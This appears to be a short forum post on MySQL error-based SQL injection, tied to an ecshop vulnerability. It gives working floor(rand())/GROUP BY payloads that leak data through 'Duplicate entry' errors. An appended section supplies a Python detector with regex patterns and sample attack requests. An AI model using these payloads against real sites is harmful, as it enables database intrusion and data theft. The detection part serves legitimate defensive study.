Yesterday I happened to read http://www.packetstormsecurity.o ... d-SQL-Injection.txt and found out that injection can be done this way:
MySQL >= 5.0 :
Run
select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
or
select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
This raises the error:
Duplicate entry '5.1.30-community1' for key 'group_key'
MySQL < 5 :
Run
select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
After several runs it raises the error:
Duplicate entry '4.1.22-community-nt:1' for key 1
This happens to solve the latest ecshop vulnerability
No gift package restriction
Affected versions: ecshop >= 2.7.0
Download package.zip
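For defenders, the statements and the error text above give two usable signals: the request carries count(*), floor(rand(..)*2) and GROUP BY together, and the application log or response carries a "Duplicate entry" error on the internal group_key. The following is an added example, not part of the original post; the function names and the sample request and log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request side: both payload families on this page put count(*), floor(rand(..)*2)
# and GROUP BY in one statement, which is rare in legitimate user input.
_RAND_GROUP = re.compile(r"count\(\*\).*floor\(rand\([^)]*\)\*2\).*group by", re.S)
# Error side: the message shown above for MySQL >= 5.0; also accepts the
# '<group_key>' spelling. The MySQL < 5 form ("for key 1") is not matched because
# ordinary unique-key violations print the same text on those servers.
_DUP_ERROR = re.compile(r"Duplicate entry '(?P<leak>[^']*)' for key '<?group_key>?'")

def normalize(raw: str) -> str:
    """Decode URL encoding twice, drop /* */ comments, squeeze whitespace, lowercase."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    text = re.sub(r"\s+", " ", text).lower()
    # Remove spaces around punctuation so "floor ( rand ( 0 ) * 2 )" still matches.
    return re.sub(r"\s*([()*,])\s*", r"\1", text)

def scan_request(raw: str) -> bool:
    """True when a request parameter string carries the rand()/GROUP BY pattern."""
    return bool(_RAND_GROUP.search(normalize(raw)))

def scan_error(line: str):
    """Return the value exposed inside the duplicate-key error, or None."""
    m = _DUP_ERROR.search(line)
    return m.group("leak") if m else None

# Constructed sample data (not taken from a real system).
REQUESTS = [
    "id=1+and+(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x"
    "+from+information_schema.tables+group+by+x)a)",
    "id=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(VERSION(),"
    "FLOOR/**/(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)",
    "q=count(*)+of+items+group+by+color",  # benign: no floor(rand(..)*2)
]
ERRORS = [
    "Duplicate entry '5.1.30-community1' for key 'group_key'",
    "Duplicate entry 'bob@example.com' for key 'email'",  # ordinary constraint error
]

def triage(requests, errors):
    """Return (suspicious requests, values exposed through group_key errors)."""
    hits = [r for r in requests if scan_request(r)]
    leaks = [v for v in map(scan_error, errors) if v is not None]
    return hits, leaks

if __name__ == "__main__":
    print(triage(REQUESTS, ERRORS))
```

A group_key duplicate error in an application log means database error text is reaching the log or the client; returning generic error pages and using parameterized queries removes both the channel and the injection point.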